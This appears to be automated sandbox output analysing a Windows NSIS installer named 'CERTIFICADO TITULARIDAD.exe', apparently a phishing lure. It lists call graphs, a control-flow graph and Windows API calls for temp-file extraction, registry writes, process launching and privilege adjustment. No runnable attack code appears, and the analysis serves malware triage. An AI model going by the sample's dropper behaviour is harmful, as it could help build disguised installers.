4061bd GetShortPathNameW 4694->4696 4721 406011 GetFileAttributesW CreateFileW 4695->4721 4698 4061d2 4696->4698 4699 4062dc 4696->4699 4698->4699 4701 4061da wsprintfA 4698->4701 4699->4637 4700 4061a1 CloseHandle GetShortPathNameW 4700->4699 4702 4061b5 4700->4702 4703 40655e 21 API calls 4701->4703 4702->4696 4702->4699 4704 406202 4703->4704 4722 406011 GetFileAttributesW CreateFileW 4704->4722 4706 40620f 4706->4699 4707 40621e GetFileSize GlobalAlloc 4706->4707 4708 406240 4707->4708 4709 4062d5 CloseHandle 4707->4709 4723 406094 ReadFile 4708->4723 4709->4699 4714 406273 4716 405f76 4 API calls 4714->4716 4715 40625f lstrcpyA 4717 406281 4715->4717 4716->4717 4718 4062b8 SetFilePointer 4717->4718 4730 4060c3 WriteFile 4718->4730 4721->4700 4722->4706 4724 4060b2 4723->4724 4724->4709 4725 405f76 lstrlenA 4724->4725 4726 405fb7 lstrlenA 4725->4726 4727 405f90 lstrcmpiA 4726->4727 4728 405fbf 4726->4728 4727->4728 4729 405fae CharNextA 4727->4729 4728->4714 4728->4715 4729->4726 4731 4060e1 GlobalFree 4730->4731 4731->4709 4733 4055c1 4732->4733 4741 401431 4732->4741 4734 4055dd lstrlenW 4733->4734 4735 40655e 21 API calls 4733->4735 4736 405606 4734->4736 4737 4055eb lstrlenW 4734->4737 4735->4734 4739 405619 4736->4739 4740 40560c SetWindowTextW 4736->4740 4738 4055fd lstrcatW 4737->4738 4737->4741 4738->4736 4739->4741 4742 40561f SendMessageW SendMessageW SendMessageW 4739->4742 4740->4739 4741->4625 4742->4741 5816 401000 5817 401037 BeginPaint GetClientRect 5816->5817 5818 40100c DefWindowProcW 5816->5818 5820 4010f3 5817->5820 5821 401179 5818->5821 5822 401073 CreateBrushIndirect FillRect DeleteObject 5820->5822 5823 4010fc 5820->5823 5822->5820 5824 401102 CreateFontIndirectW 5823->5824 5825 401167 EndPaint 5823->5825 5824->5825 5826 401112 6 API calls 5824->5826 5825->5821 5826->5825 6120 401503 6121 401508 6120->6121 6123 401520 6120->6123 6122 402d89 21 API calls 6121->6122 6122->6123 5827 401a04 5828 402dab 21 API calls 5827->5828 5829 401a0b 5828->5829 5830 402dab 21 API calls 5829->5830 5831 401a14 5830->5831 5832 401a1b lstrcmpiW 5831->5832 5833 401a2d lstrcmpW 5831->5833 5834 401a21 5832->5834 5833->5834 6124 402304 6125 402dab 21 API calls 6124->6125 6126 40230a 6125->6126 6127 402dab 21 API calls 6126->6127 6128 402313 6127->6128 6129 402dab 21 API calls 6128->6129 6130 40231c 6129->6130 6131 40687e 2 API calls 6130->6131 6132 402325 6131->6132 6133 402336 lstrlenW lstrlenW 6132->6133 6134 402329 6132->6134 6136 4055a6 28 API calls 6133->6136 6135 4055a6 28 API calls 6134->6135 6138 402331 6134->6138 6135->6138 6137 402374 SHFileOperationW 6136->6137 6137->6134 6137->6138 6314 401d86 6315 401d99 GetDlgItem 6314->6315 6316 401d8c 6314->6316 6318 401d93 6315->6318 6317 402d89 21 API calls 6316->6317 6317->6318 6319 401dda GetClientRect LoadImageW SendMessageW 6318->6319 6320 402dab 21 API calls 6318->6320 6322 401e38 6319->6322 6324 401e44 6319->6324 6320->6319 6323 401e3d DeleteObject 6322->6323 6322->6324 6323->6324 6325 402388 6326 40238f 6325->6326 6329 4023a2 6325->6329 6327 40655e 21 API calls 6326->6327 6328 40239c 6327->6328 6328->6329 6330 405b81 MessageBoxIndirectW 6328->6330 6330->6329 5835 402c0a SendMessageW 5836 402c24 InvalidateRect 5835->5836 5837 402c2f 5835->5837 5836->5837 6331 73f7103d 6334 73f7101b 6331->6334 6335 73f715b6 GlobalFree 6334->6335 6336 73f71020 6335->6336 6337 73f71027 GlobalAlloc 6336->6337 6338 73f71024 6336->6338 6337->6338 6339 73f715dd 3 API calls 6338->6339 6340 73f7103b 6339->6340 6139 404f0d GetDlgItem GetDlgItem 6140 404f5f 7 API calls 6139->6140 6152 405184 6139->6152 6141 405006 DeleteObject 6140->6141 6142 404ff9 SendMessageW 6140->6142 6143 40500f 6141->6143 6142->6141 6145 405046 6143->6145 6147 40655e 21 API calls 6143->6147 6144 405266 6146 405312 6144->6146 6156 4052bf SendMessageW 6144->6156 6182 405177 6144->6182 6148 4044a0 22 API calls 6145->6148 6150 405324 6146->6150 6151 40531c SendMessageW 6146->6151 6153 405028 SendMessageW SendMessageW 6147->6153 6154 40505a 6148->6154 6149 4051f3 6149->6144 6157 405258 SendMessageW 6149->6157 6163 405336 ImageList_Destroy 6150->6163 6164 40533d 6150->6164 6168 40534d 6150->6168 6151->6150 6152->6144 6152->6149 6193 404e5b SendMessageW 6152->6193 6153->6143 6155 4044a0 22 API calls 6154->6155 6171 40506b 6155->6171 6161 4052d4 SendMessageW 6156->6161 6156->6182 6157->6144 6158 404507 8 API calls 6162 405513 6158->6162 6160 4054c7 6169 4054d9 ShowWindow GetDlgItem ShowWindow 6160->6169 6160->6182 6166 4052e7 6161->6166 6163->6164 6167 405346 GlobalFree 6164->6167 6164->6168 6165 405146 GetWindowLongW SetWindowLongW 6170 40515f 6165->6170 6176 4052f8 SendMessageW 6166->6176 6167->6168 6168->6160 6186 405388 6168->6186 6198 404edb 6168->6198 6169->6182 6172 405164 ShowWindow 6170->6172 6173 40517c 6170->6173 6171->6165 6175 4050be SendMessageW 6171->6175 6177 405141 6171->6177 6179 405110 SendMessageW 6171->6179 6180 4050fc SendMessageW 6171->6180 6191 4044d5 SendMessageW 6172->6191 6192 4044d5 SendMessageW 6173->6192 6175->6171 6176->6146 6177->6165 6177->6170 6179->6171 6180->6171 6182->6158 6183 405492 6184 40549d InvalidateRect 6183->6184 6188 4054a9 6183->6188 6184->6188 6185 4053b6 SendMessageW 6187 4053cc 6185->6187 6186->6185 6186->6187 6187->6183 6190 405440 SendMessageW SendMessageW 6187->6190 6188->6160 6207 404e16 6188->6207 6190->6187 6191->6182 6192->6152 6194 404eba SendMessageW 6193->6194 6195 404e7e GetMessagePos ScreenToClient SendMessageW 6193->6195 6196 404eb2 6194->6196 6195->6196 6197 404eb7 6195->6197 6196->6149 6197->6194 6210 406521 lstrcpynW 6198->6210 6200 404eee 6211 406468 wsprintfW 6200->6211 6202 404ef8 6203 40140b 2 API calls 6202->6203 6204 404f01 6203->6204 6212 406521 lstrcpynW 6204->6212 6206 404f08 6206->6186 6213 404d4d 6207->6213 6209 404e2b 6209->6160 6210->6200 6211->6202 6212->6206 6214 404d66 6213->6214 6215 40655e 21 API calls 6214->6215 6216 404dca 6215->6216 6217 40655e 21 API calls 6216->6217 6218 404dd5 6217->6218 6219 40655e 21 API calls 6218->6219 6220 404deb lstrlenW wsprintfW SetDlgItemTextW 6219->6220 6220->6209 5076 40248f 5077 402dab 21 API calls 5076->5077 5078 4024a1 5077->5078 5079 402dab 21 API calls 5078->5079 5080 4024ab 5079->5080 5093 402e3b 5080->5093 5083 4024e3 5085 4024ef 5083->5085 5088 402d89 21 API calls 5083->5088 5084 402dab 21 API calls 5087 4024d9 lstrlenW 5084->5087 5089 40250e RegSetValueExW 5085->5089 5097 4032b9 5085->5097 5086 402c2f 5087->5083 5088->5085 5091 402524 RegCloseKey 5089->5091 5091->5086 5094 402e56 5093->5094 5118 4063bc 5094->5118 5099 4032d2 5097->5099 5098 4032fd 5122 40349e 5098->5122 5099->5098 5132 4034b4 SetFilePointer 5099->5132 5103 403428 5103->5089 5104 40331a GetTickCount 5116 40332d 5104->5116 5105 40343e 5106 403442 5105->5106 5110 40345a 5105->5110 5107 40349e ReadFile 5106->5107 5107->5103 5108 40349e ReadFile 5108->5110 5109 40349e ReadFile 5109->5116 5110->5103 5110->5108 5111 4060c3 WriteFile 5110->5111 5111->5110 5113 403393 GetTickCount 5113->5116 5114 4033bc MulDiv wsprintfW 5115 4055a6 28 API calls 5114->5115 5115->5116 5116->5103 5116->5109 5116->5113 5116->5114 5117 4060c3 WriteFile 5116->5117 5125 406a90 5116->5125 5117->5116 5119 4063cb 5118->5119 5120 4024bb 5119->5120 5121 4063d6 RegCreateKeyExW 5119->5121 5120->5083 5120->5084 5120->5086 5121->5120 5123 406094 ReadFile 5122->5123 5124 403308 5123->5124 5124->5103 5124->5104 5124->5105 5126 406ab5 5125->5126 5129 406abd 5125->5129 5126->5116 5127 406b44 GlobalFree 5128 406b4d GlobalAlloc 5127->5128 5128->5126 5128->5129 5129->5126 5129->5127 5129->5128 5130 406bc4 GlobalAlloc 5129->5130 5131 406bbb GlobalFree 5129->5131 5130->5126 5130->5129 5131->5130 5132->5098 5150 402910 5151 402dab 21 API calls 5150->5151 5152 402917 FindFirstFileW 5151->5152 5153 40293f 5152->5153 5156 40292a 5152->5156 5154 402948 5153->5154 5158 406468 wsprintfW 5153->5158 5159 406521 lstrcpynW 5154->5159 5158->5154 5159->5156 5838 404610 lstrlenW 5839 404631 WideCharToMultiByte 5838->5839 5840 40462f 5838->5840 5840->5839 5980 401491 5981 4055a6 28 API calls 5980->5981 5982 401498 5981->5982 6221 401911 6222 401948 6221->6222 6223 402dab 21 API calls 6222->6223 6224 40194d 6223->6224 6225 405c2d 71 API calls 6224->6225 6226 401956 6225->6226 6348 404991 6349 4049bd 6348->6349 6350 4049ce 6348->6350 6409 405b65 GetDlgItemTextW 6349->6409 6352 4049da GetDlgItem 6350->6352 6357 404a39 6350->6357 6354 4049ee 6352->6354 6353 4049c8 6356 4067cf 5 API calls 6353->6356 6359 404a02 SetWindowTextW 6354->6359 6365 405e9b 4 API calls 6354->6365 6355 404b1d 6360 404ccc 6355->6360 6411 405b65 GetDlgItemTextW 6355->6411 6356->6350 6357->6355 6357->6360 6361 40655e 21 API calls 6357->6361 6363 4044a0 22 API calls 6359->6363 6364 404507 8 API calls 6360->6364 6366 404aad SHBrowseForFolderW 6361->6366 6362 404b4d 6367 405ef8 18 API calls 6362->6367 6368 404a1e 6363->6368 6369 404ce0 6364->6369 6370 4049f8 6365->6370 6366->6355 6371 404ac5 CoTaskMemFree 6366->6371 6372 404b53 6367->6372 6373 4044a0 22 API calls 6368->6373 6370->6359 6376 405df0 3 API calls 6370->6376 6374 405df0 3 API calls 6371->6374 6412 406521 lstrcpynW 6372->6412 6375 404a2c 6373->6375 6377 404ad2 6374->6377 6410 4044d5 SendMessageW 6375->6410 6376->6359 6380 404b09 SetDlgItemTextW 6377->6380 6385 40655e 21 API calls 6377->6385 6380->6355 6381 404a32 6383 406915 5 API calls 6381->6383 6382 404b6a 6384 406915 5 API calls 6382->6384 6383->6357 6392 404b71 6384->6392 6386 404af1 lstrcmpiW 6385->6386 6386->6380 6389 404b02 lstrcatW 6386->6389 6387 404bb2 6413 406521 lstrcpynW 6387->6413 6389->6380 6390 404bb9 6391 405e9b 4 API calls 6390->6391 6393 404bbf GetDiskFreeSpaceW 6391->6393 6392->6387 6395 405e3c 2 API calls 6392->6395 6397 404c0a 6392->6397 6396 404be3 MulDiv 6393->6396 6393->6397 6395->6392 6396->6397 6398 404c7b 6397->6398 6399 404e16 24 API calls 6397->6399 6400 404c9e 6398->6400 6402 40140b 2 API calls 6398->6402 6401 404c68 6399->6401 6414 4044c2 KiUserCallbackDispatcher 6400->6414 6404 404c7d SetDlgItemTextW 6401->6404 6405 404c6d 6401->6405 6402->6400 6404->6398 6407 404d4d 24 API calls 6405->6407 6406 404cba 6406->6360 6408 4048ea SendMessageW 6406->6408 6407->6398 6408->6360 6409->6353 6410->6381 6411->6362 6412->6382 6413->6390 6414->6406 6227 401914 6228 402dab 21 API calls 6227->6228 6229 40191b 6228->6229 6230 405b81 MessageBoxIndirectW 6229->6230 6231 401924 6230->6231 5983 402896 5984 40289d 5983->5984 5986 402bae 5983->5986 5985 402d89 21 API calls 5984->5985 5987 4028a4 5985->5987 5988 4028b3 SetFilePointer 5987->5988 5988->5986 5989 4028c3 5988->5989 5991 406468 wsprintfW 5989->5991 5991->5986 6232 401f17 6233 402dab 21 API calls 6232->6233 6234 401f1d 6233->6234 6235 402dab 21 API calls 6234->6235 6236 401f26 6235->6236 6237 402dab 21 API calls 6236->6237 6238 401f2f 6237->6238 6239 402dab 21 API calls 6238->6239 6240 401f38 6239->6240 6241 401423 28 API calls 6240->6241 6242 401f3f 6241->6242 6249 405b47 ShellExecuteExW 6242->6249 6244 401f87 6247 402933 6244->6247 6250 4069c0 WaitForSingleObject 6244->6250 6246 401fa4 CloseHandle 6246->6247 6249->6244 6251 4069da 6250->6251 6252 4069ec GetExitCodeProcess 6251->6252 6253 406951 2 API calls 6251->6253 6252->6246 6254 4069e1 WaitForSingleObject 6253->6254 6254->6251 6415 402f98 6416 402fc3 6415->6416 6417 402faa SetTimer 6415->6417 6418 403018 6416->6418 6419 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 6416->6419 6417->6416 6419->6418 6255 40551a 6256 40552a 6255->6256 6257 40553e 6255->6257 6258 405530 6256->6258 6259 405587 6256->6259 6260 405546 IsWindowVisible 6257->6260 6266 40555d 6257->6266 6262 4044ec SendMessageW 6258->6262 6261 40558c CallWindowProcW 6259->6261 6260->6259 6263 405553 6260->6263 6264 40553a 6261->6264 6262->6264 6265 404e5b 5 API calls 6263->6265 6265->6266 6266->6261 6267 404edb 4 API calls 6266->6267 6267->6259 6268 401d1c 6269 402d89 21 API calls 6268->6269 6270 401d22 IsWindow 6269->6270 6271 401a25 6270->6271 5992 40149e 5993 4023a2 5992->5993 5994 4014ac PostQuitMessage 5992->5994 5994->5993 6420 401ba0 6421 401bf1 6420->6421 6424 401bad 6420->6424 6422 401bf6 6421->6422 6423 401c1b GlobalAlloc 6421->6423 6434 4023a2 6422->6434 6441 406521 lstrcpynW 6422->6441 6426 40655e 21 API calls 6423->6426 6425 401c36 6424->6425 6429 401bc4 6424->6429 6427 40655e 21 API calls 6425->6427 6425->6434 6426->6425 6430 40239c 6427->6430 6439 406521 lstrcpynW 6429->6439 6430->6434 6435 405b81 MessageBoxIndirectW 6430->6435 6431 401c08 GlobalFree 6431->6434 6433 401bd3 6440 406521 lstrcpynW 6433->6440 6435->6434 6437 401be2 6442 406521 lstrcpynW 6437->6442 6439->6433 6440->6437 6441->6431 6442->6434 4753 403fa1 4754 403fb9 4753->4754 4755 40411a 4753->4755 4754->4755 4756 403fc5 4754->4756 4757 40416b 4755->4757 4758 40412b GetDlgItem GetDlgItem 4755->4758 4760 403fd0 SetWindowPos 4756->4760 4761 403fe3 4756->4761 4759 4041c5 4757->4759 4770 401389 2 API calls 4757->4770 4762 4044a0 22 API calls 4758->4762 4771 404115 4759->4771 4826 4044ec 4759->4826 4760->4761 4764 403fec ShowWindow 4761->4764 4765 40402e 4761->4765 4766 404155 SetClassLongW 4762->4766 4772 404107 4764->4772 4773 40400c GetWindowLongW 4764->4773 4767 404036 DestroyWindow 4765->4767 4768 40404d 4765->4768 4769 40140b 2 API calls 4766->4769 4774 404429 4767->4774 4775 404052 SetWindowLongW 4768->4775 4776 404063 4768->4776 4769->4757 4777 40419d 4770->4777 4848 404507 4772->4848 4773->4772 4779 404025 ShowWindow 4773->4779 4774->4771 4786 40445a ShowWindow 4774->4786 4775->4771 4776->4772 4780 40406f GetDlgItem 4776->4780 4777->4759 4781 4041a1 SendMessageW 4777->4781 4779->4765 4784 404080 SendMessageW IsWindowEnabled 4780->4784 4785 40409d 4780->4785 4781->4771 4782 40140b 2 API calls 4793 4041d7 4782->4793 4783 40442b DestroyWindow EndDialog 4783->4774 4784->4771 4784->4785 4788 4040aa 4785->4788 4790 4040f1 SendMessageW 4785->4790 4791 4040bd 4785->4791 4800 4040a2 4785->4800 4786->4771 4787 40655e 21 API calls 4787->4793 4788->4790 4788->4800 4790->4772 4794 4040c5 4791->4794 4795 4040da 4791->4795 4792 4040d8 4792->4772 4793->4771 4793->4782 4793->4783 4793->4787 4796 4044a0 22 API calls 4793->4796 4817 40436b DestroyWindow 4793->4817 4829 4044a0 4793->4829 4842 40140b 4794->4842 4797 40140b 2 API calls 4795->4797 4796->4793 4799 4040e1 4797->4799 4799->4772 4799->4800 4845 404479 4800->4845 4802 404252 GetDlgItem 4803 404267 4802->4803 4804 40426f ShowWindow KiUserCallbackDispatcher 4802->4804 4803->4804 4832 4044c2 KiUserCallbackDispatcher 4804->4832 4806 404299 EnableWindow 4811 4042ad 4806->4811 4807 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4808 4042e2 SendMessageW 4807->4808 4807->4811 4808->4811 4811->4807 4833 4044d5 SendMessageW 4811->4833 4834 403f82 4811->4834 4837 406521 lstrcpynW 4811->4837 4813 404311 lstrlenW 4814 40655e 21 API calls 4813->4814 4815 404327 SetWindowTextW 4814->4815 4838 401389 4815->4838 4817->4774 4818 404385 CreateDialogParamW 4817->4818 4818->4774 4819 4043b8 4818->4819 4820 4044a0 22 API calls 4819->4820 4821 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4820->4821 4822 401389 2 API calls 4821->4822 4823 404409 4822->4823 4823->4771 4824 404411 ShowWindow 4823->4824 4825 4044ec SendMessageW 4824->4825 4825->4774 4827 404504 4826->4827 4828 4044f5 SendMessageW 4826->4828 4827->4793 4828->4827 4830 40655e 21 API calls 4829->4830 4831 4044ab SetDlgItemTextW 4830->4831 4831->4802 4832->4806 4833->4811 4835 40655e 21 API calls 4834->4835 4836 403f90 SetWindowTextW 4835->4836 4836->4811 4837->4813 4840 401390 4838->4840 4839 4013fe 4839->4793 4840->4839 4841 4013cb MulDiv SendMessageW 4840->4841 4841->4840 4843 401389 2 API calls 4842->4843 4844 401420 4843->4844 4844->4800 4846 404480 4845->4846 4847 404486 SendMessageW 4845->4847 4846->4847 4847->4792 4849 4045ca 4848->4849 4850 40451f GetWindowLongW 4848->4850 4849->4771 4850->4849 4851 404534 4850->4851 4851->4849 4852 404561 GetSysColor 4851->4852 4853 404564 4851->4853 4852->4853 4854 404574 SetBkMode 4853->4854 4855 40456a SetTextColor 4853->4855 4856 404592 4854->4856 4857 40458c GetSysColor 4854->4857 4855->4854 4858 4045a3 4856->4858 4859 404599 SetBkColor 4856->4859 4857->4856 4858->4849 4860 4045b6 DeleteObject 4858->4860 4861 4045bd CreateBrushIndirect 4858->4861 4859->4858 4860->4861 4861->4849 5841 402621 5842 402dab 21 API calls 5841->5842 5843 402628 5842->5843 5846 406011 GetFileAttributesW CreateFileW 5843->5846 5845 402634 5846->5845 6443 4025a3 6444 402deb 21 API calls 6443->6444 6445 4025ad 6444->6445 6446 402d89 21 API calls 6445->6446 6447 4025b6 6446->6447 6448 4025d2 RegEnumKeyW 6447->6448 6449 4025de RegEnumValueW 6447->6449 6450 402933 6447->6450 6451 4025f3 RegCloseKey 6448->6451 6449->6451 6451->6450 5069 4015a8 5070 402dab 21 API calls 5069->5070 5071 4015af SetFileAttributesW 5070->5071 5072 4015c1 5071->5072 6453 401fa9 6454 402dab 21 API calls 6453->6454 6455 401faf 6454->6455 6456 4055a6 28 API calls 6455->6456 6457 401fb9 6456->6457 6458 405b04 2 API calls 6457->6458 6459 401fbf 6458->6459 6460 401fe2 CloseHandle 6459->6460 6462 4069c0 5 API calls 6459->6462 6463 402933 6459->6463 6460->6463 6464 401fd4 6462->6464 6464->6460 6466 406468 wsprintfW 6464->6466 6466->6460 5133 40252f 5144 402deb 5133->5144 5136 402dab 21 API calls 5137 402542 5136->5137 5138 40254d RegQueryValueExW 5137->5138 5143 402933 5137->5143 5139 402573 RegCloseKey 5138->5139 5140 40256d 5138->5140 5139->5143 5140->5139 5149 406468 wsprintfW 5140->5149 5145 402dab 21 API calls 5144->5145 5146 402e02 5145->5146 5147 40638e RegOpenKeyExW 5146->5147 5148 402539 5147->5148 5148->5136 5149->5139 5854 40202f 5855 402dab 21 API calls 5854->5855 5856 402036 5855->5856 5857 406915 5 API calls 5856->5857 5858 402045 5857->5858 5859 402061 GlobalAlloc 5858->5859 5860 4020d1 5858->5860 5859->5860 5861 402075 5859->5861 5862 406915 5 API calls 5861->5862 5863 40207c 5862->5863 5864 406915 5 API calls 5863->5864 5865 402086 5864->5865 5865->5860 5869 406468 wsprintfW 5865->5869 5867 4020bf 5870 406468 wsprintfW 5867->5870 5869->5867 5870->5860 6467 4021af 6468 402dab 21 API calls 6467->6468 6469 4021b6 6468->6469 6470 402dab 21 API calls 6469->6470 6471 4021c0 6470->6471 6472 402dab 21 API calls 6471->6472 6473 4021ca 6472->6473 6474 402dab 21 API calls 6473->6474 6475 4021d4 6474->6475 6476 402dab 21 API calls 6475->6476 6477 4021de 6476->6477 6478 40221d CoCreateInstance 6477->6478 6479 402dab 21 API calls 6477->6479 6482 40223c 6478->6482 6479->6478 6480 401423 28 API calls 6481 4022fb 6480->6481 6482->6480 6482->6481 6483 403bb1 6484 403bbc 6483->6484 6485 403bc3 GlobalAlloc 6484->6485 6486 403bc0 6484->6486 6485->6486 5871 401a35 5872 402dab 21 API calls 5871->5872 5873 401a3e ExpandEnvironmentStringsW 5872->5873 5874 401a52 5873->5874 5876 401a65 5873->5876 5875 401a57 lstrcmpW 5874->5875 5874->5876 5875->5876 5210 4023b7 5211 4023bf 5210->5211 5213 4023c5 5210->5213 5212 402dab 21 API calls 5211->5212 5212->5213 5215 4023d3 5213->5215 5216 402dab 21 API calls 5213->5216 5214 4023e1 5218 402dab 21 API calls 5214->5218 5215->5214 5217 402dab 21 API calls 5215->5217 5216->5215 5217->5214 5219 4023ea WritePrivateProfileStringW 5218->5219 6487 73f71000 6488 73f7101b 5 API calls 6487->6488 6489 73f71019 6488->6489 6000 4014b8 6001 4014be 6000->6001 6002 401389 2 API calls 6001->6002 6003 4014c6 6002->6003 5225 402439 5226 402441 5225->5226 5227 40246c 5225->5227 5228 402deb 21 API calls 5226->5228 5229 402dab 21 API calls 5227->5229 5230 402448 5228->5230 5231 402473 5229->5231 5232 402452 5230->5232 5235 402480 5230->5235 5237 402e69 5231->5237 5234 402dab 21 API calls 5232->5234 5236 402459 RegDeleteValueW RegCloseKey 5234->5236 5236->5235 5238 402e76 5237->5238 5239 402e7d 5237->5239 5238->5235 5239->5238 5241 402eae 5239->5241 5242 40638e RegOpenKeyExW 5241->5242 5243 402edc 5242->5243 5244 402f91 5243->5244 5245 402ee6 5243->5245 5244->5238 5246 402eec RegEnumValueW 5245->5246 5250 402f0f 5245->5250 5247 402f76 RegCloseKey 5246->5247 5246->5250 5247->5244 5248 402f4b RegEnumKeyW 5249 402f54 RegCloseKey 5248->5249 5248->5250 5251 406915 5 API calls 5249->5251 5250->5247 5250->5248 5250->5249 5252 402eae 6 API calls 5250->5252 5253 402f64 5251->5253 5252->5250 5254 402f86 5253->5254 5255 402f68 RegDeleteKeyW 5253->5255 5254->5244 5255->5244 5263 40173a 5264 402dab 21 API calls 5263->5264 5265 401741 SearchPathW 5264->5265 5266 40175c 5265->5266 6004 73f7170d 6010 73f715b6 6004->6010 6006 73f7176b GlobalFree 6007 73f71740 6007->6006 6008 73f71725 6008->6006 6008->6007 6009 73f71757 VirtualFree 6008->6009 6009->6006 6012 73f715bc 6010->6012 6011 73f715c2 6011->6008 6012->6011 6013 73f715ce GlobalFree 6012->6013 6013->6008 6279 401d3d 6280 402d89 21 API calls 6279->6280 6281 401d44 6280->6281 6282 402d89 21 API calls 6281->6282 6283 401d50 GetDlgItem 6282->6283 6284 40263d 6283->6284 5877 406c3f 5881 406ac3 5877->5881 5878 40742e 5879 406b44 GlobalFree 5880 406b4d GlobalAlloc 5879->5880 5880->5878 5880->5881 5881->5878 5881->5879 5881->5880 5882 406bc4 GlobalAlloc 5881->5882 5883 406bbb GlobalFree 5881->5883 5882->5878 5882->5881 5883->5882

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 4034fc-40354e SetErrorMode GetVersionExW 1 403550-403580 GetVersionExW 0->1 2 403588-40358d 0->2 1->2 3 403595-4035d7 2->3 4 40358f 2->4 5 4035d9-4035e1 call 406915 3->5 6 4035ea 3->6 4->3 5->6 11 4035e3 5->11 8 4035ef-403603 call 4068a5 lstrlenA 6->8 13 403605-403621 call 406915 * 3 8->13 11->6 20 403632-403696 #17 OleInitialize SHGetFileInfoW call 406521 GetCommandLineW call 406521 13->20 21 403623-403629 13->21 28 403698-40369a 20->28 29 40369f-4036b3 call 405e1d CharNextW 20->29 21->20 25 40362b 21->25 25->20 28->29 32 4037ae-4037b4 29->32 33 4036b8-4036be 32->33 34 4037ba 32->34 36 4036c0-4036c5 33->36 37 4036c7-4036ce 33->37 35 4037ce-4037e8 GetTempPathW call 4034cb 34->35 46 403840-40385a DeleteFileW call 403082 35->46 47 4037ea-403808 GetWindowsDirectoryW lstrcatW call 4034cb 35->47 36->36 36->37 39 4036d0-4036d5 37->39 40 4036d6-4036da 37->40 39->40 41 4036e0-4036e6 40->41 42 40379b-4037aa call 405e1d 40->42 44 403700-403739 41->44 45 4036e8-4036ef 41->45 42->32 57 4037ac-4037ad 42->57 51 403756-403790 44->51 52 40373b-403740 44->52 49 4036f1-4036f4 45->49 50 4036f6 45->50 62 403860-403866 46->62 63 403a47-403a57 call 403b19 OleUninitialize 46->63 47->46 66 40380a-40383a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034cb 47->66 49->44 49->50 50->44 60 403792-403796 51->60 61 403798-40379a 51->61 52->51 58 403742-40374a 52->58 57->32 64 403751 58->64 65 40374c-40374f 58->65 60->61 67 4037bc-4037c9 call 406521 60->67 61->42 68 40386c-403877 call 405e1d 62->68 69 4038ff-403906 call 403bf3 62->69 77 403a59-403a69 call 405b81 ExitProcess 63->77 78 403a7d-403a83 63->78 64->51 65->51 65->64 66->46 66->63 67->35 82 4038c5-4038cf 68->82 83 403879-4038ae 68->83 80 40390b-40390f 69->80 84 403b01-403b09 78->84 85 403a85-403a9b GetCurrentProcess OpenProcessToken 78->85 80->63 92 4038d1-4038df call 405ef8 82->92 93 403914-40393a call 405aec lstrlenW call 406521 82->93 89 4038b0-4038b4 83->89 86 403b0b 84->86 87 403b0f-403b13 ExitProcess 84->87 90 403ad1-403adf call 406915 85->90 91 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 85->91 86->87 94 4038b6-4038bb 89->94 95 4038bd-4038c1 89->95 104 403ae1-403aeb 90->104 105 403aed-403af8 ExitWindowsEx 90->105 91->90 92->63 106 4038e5-4038fb call 406521 * 2 92->106 112 40394b-403963 93->112 113 40393c-403946 call 406521 93->113 94->95 99 4038c3 94->99 95->89 95->99 99->82 104->105 108 403afa-403afc call 40140b 104->108 105->84 105->108 106->69 108->84 117 403968-40396c 112->117 113->112 119 403971-40399b wsprintfW call 40655e 117->119 122 4039a4 call 405acf 119->122 123 40399d-4039a2 call 405a75 119->123 127 4039a9-4039ab 122->127 123->127 128 4039e7-403a06 SetCurrentDirectoryW call 4062e1 CopyFileW 127->128 129 4039ad-4039b7 GetFileAttributesW 127->129 136 403a45 128->136 137 403a08-403a29 call 4062e1 call 40655e call 405b04 128->137 131 4039d8-4039e3 129->131 132 4039b9-4039c2 DeleteFileW 129->132 131->117 135 4039e5 131->135 132->131 134 4039c4-4039d6 call 405c2d 132->134 134->119 134->131 135->63 136->63 146 403a2b-403a35 137->146 147 403a6f-403a7b CloseHandle 137->147 146->136 148 403a37-403a3f call 40687e 146->148 147->136 148->119 148->136
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE ref: 0040351F
                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
                                                                                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040363A
                                                                                                                          • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
                                                                                                                          • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",00000020,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FC
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403818
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
